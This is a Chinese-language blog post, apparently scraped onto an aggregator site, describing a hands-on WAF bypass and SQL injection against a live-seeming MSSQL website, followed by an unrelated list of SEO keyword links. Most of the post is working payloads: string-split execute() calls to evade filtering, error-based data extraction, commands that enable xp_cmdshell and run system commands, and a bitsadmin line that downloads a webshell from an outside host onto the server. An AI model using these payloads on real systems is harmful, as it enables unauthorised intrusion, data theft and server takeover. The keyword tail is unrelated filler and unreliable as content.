MSSQL WAF绕过(2)
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,0x00 前言上次的绕过太简单,也没有能注出数据或者获取权限,这次继续绕过,获取数据0x01 过程还是上次的站点,简单的判断,存在注入发现and 数字、exec、union select、 selec
千家信息网最后更新 2025年12月02日MSSQL WAF绕过(2)
0x00 前言
上次的绕过太简单,也没有能注出数据或者获取权限,这次继续绕过,获取数据
0x01 过程
还是上次的站点,简单的判断,存在注入
发现and 数字、exec、union select、 select 数字。。。被过滤
发现execute函数没被过滤,狗没出来说明这个函数能用
execute('sql语句') //execute函数中可以写sql语句,且为字符串,那么就可以传入一些变形字符串来绕过waf本地验证一下
一些变形
只是本次使用sql server堆叠注入,并不会将数据展示在页面,所以要让这一次的堆叠出错,达到报错注入的效果
execute('select convert(int,@@version)') --a当然需要变形一下,不然会被拦截,因为出现了select
execute('sel'%2b'ect convert(int,@@version)') --a //在url编码中 %2b 等价与 + 所以可以理解为 'sel' + 'ect'通过execute函数,可进行变形导致waf无法拦截,获取数据或执行sql语句就变得简单多了
执行cmdshell,由于cmdshell不能通过报错回显,但是可以将结果重定向到文件中或写入表中
execute('master..xp_cmdshell whoami > e:\'%2b'\xx\'%2b'\1.txt') // 双斜杠被过滤返回报错并没有关系,waf没有拦截,查看1.txt是否有数据
0x02 后续
本来想写入webshell或通过公网下载webshell,但服务器不能出外网,且有waf,导致写shell失败,考虑后想kill掉waf,但还是避免对服务器造成影响。。
0x03 其他
附上其他在这次测试中用到的命令
execute('sp_configure "show advanced options",1')execute('reconfigure')execute('sp_configure "xp_cmdshell", 1')execute('reconfigure') //上述四步,使xp_cmdshell开启execute('master..xp_cmdshell "bitsadmin /transfer n http://xxxxx/1.aspx c:\\路径\\123.aspx"') //从公网下载webshell,本文中因机器不能出外网导致下载失败
数据
函数
语句
字符
字符串
数字
服务器
还是
公网
服务
中用
前言
只是
命令
效果
文件
斜杠
机器
权限
站点
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
kvm服务器的安全设置
数据库导入不支持降级路径
魔兽怀旧版有几个pve服务器
敏捷软件开发读后感
石家庄点网络技术有限公司
网络安全法的罚款规定
福建医院网络技术招聘
吉林潮流软件开发服务推广
账户网络安全管理办法
网络安全法对自然人罚款
财政网络安全规范
卵菌功能分类数据库
超微服务器trt什么意思
服务器系统有那些
软件开发行业产品经理职责
微擎 数据库备份
手机连接数据库文件
网络技术培训报告计算机
科技创新互联网专业
导出数据库表到excel
网络安全情况调查
虚拟奖品数据库发放设计
数据库可以装win8吗
PKA系数数据库
服务器12通道内存卡顿
学软件开发需要什么样的电脑
连接数据库的三个包是
2_开展质检和数据库汇交
不用数据库用什么软件
软件开发注册商标多少类